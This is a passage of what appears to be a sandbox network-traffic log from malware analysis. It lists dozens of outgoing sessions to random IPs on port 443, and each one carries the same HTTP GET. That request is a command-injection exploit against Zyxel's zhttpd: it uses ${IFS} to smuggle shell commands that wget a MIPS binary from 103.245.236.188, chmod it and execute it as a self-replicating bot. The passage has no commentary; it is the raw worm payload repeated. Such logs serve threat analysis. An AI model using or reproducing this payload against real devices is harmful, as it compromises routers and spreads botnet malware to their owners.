                                                Jan 12, 2024 18:16:37.787545919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8027192.168.2.2339544104.202.82.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787575960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8028192.168.2.23466224.153.172.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787611008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8029192.168.2.235256236.229.241.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787664890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8030192.168.2.2356086191.168.168.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787705898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8031192.168.2.234194639.67.79.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787754059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8032192.168.2.233337058.167.111.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787786007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8033192.168.2.2345566213.122.28.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787827015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8034192.168.2.233464889.45.158.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787848949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8035192.168.2.2333252165.229.48.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787915945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8036192.168.2.2343336139.191.137.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787969112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8037192.168.2.235061696.228.65.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787992954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8038192.168.2.2355930153.188.2.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788041115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8039192.168.2.234232823.185.205.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788075924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8040192.168.2.236065874.189.200.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788129091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8041192.168.2.2345242197.151.157.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788166046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8042192.168.2.2337208222.140.226.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788209915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8043192.168.2.236049278.13.214.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788233995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8044192.168.2.235927464.62.132.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788276911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8045192.168.2.2346848170.255.252.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788316011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8046192.168.2.2353192203.198.56.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788392067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8047192.168.2.233892686.123.84.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788414955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8048192.168.2.235933443.73.151.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788456917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8049192.168.2.234353435.35.143.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788521051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8050192.168.2.2357056119.253.170.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788544893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8051192.168.2.234131688.42.72.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788585901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8052192.168.2.235940052.182.119.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788634062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8053192.168.2.2346674173.237.185.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788676023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8054192.168.2.2340088111.204.219.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788726091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8055192.168.2.235139224.31.178.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788777113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8056192.168.2.235594643.44.186.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788810968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8057192.168.2.2346434120.3.72.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788876057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8058192.168.2.234473461.152.38.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788923979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8059192.168.2.2355384135.152.221.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.788986921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8060192.168.2.235552043.186.255.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789026976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8061192.168.2.234143631.133.196.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789083004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8062192.168.2.235561868.154.117.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789098978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8063192.168.2.2358186134.8.45.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789145947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8064192.168.2.233382651.87.71.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789200068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8065192.168.2.235815046.108.23.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789227962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8066192.168.2.2337738163.22.4.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789263010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8067192.168.2.2355204196.100.43.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789323092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8068192.168.2.2342328205.85.37.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789375067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8069192.168.2.235672459.20.227.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789412022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8070192.168.2.2345924172.70.97.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789443016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8071192.168.2.2350162221.34.38.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789494991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8072192.168.2.235564498.116.114.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789534092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8073192.168.2.2338424144.5.99.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789575100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8074192.168.2.2340420213.83.180.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789613962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8075192.168.2.2348770172.193.11.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789638996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8076192.168.2.2340554164.237.211.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789694071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8077192.168.2.235357840.222.66.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789743900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8078192.168.2.234591286.174.134.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789752960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8079192.168.2.2334934108.33.68.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789824009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8080192.168.2.234510439.88.197.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789848089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8081192.168.2.235526070.60.237.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789877892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8082192.168.2.236096863.212.153.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789941072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8083192.168.2.235039678.178.28.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789958954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8084192.168.2.235532669.88.132.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.789999008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8085192.168.2.234209262.236.60.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790033102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8086192.168.2.2354446140.50.190.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790086031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8087192.168.2.235207859.217.87.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790129900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8088192.168.2.2340216105.132.156.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.790165901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8089192.168.2.234919058.141.55.147443
                                                TimestampBytes transferredDirectionData
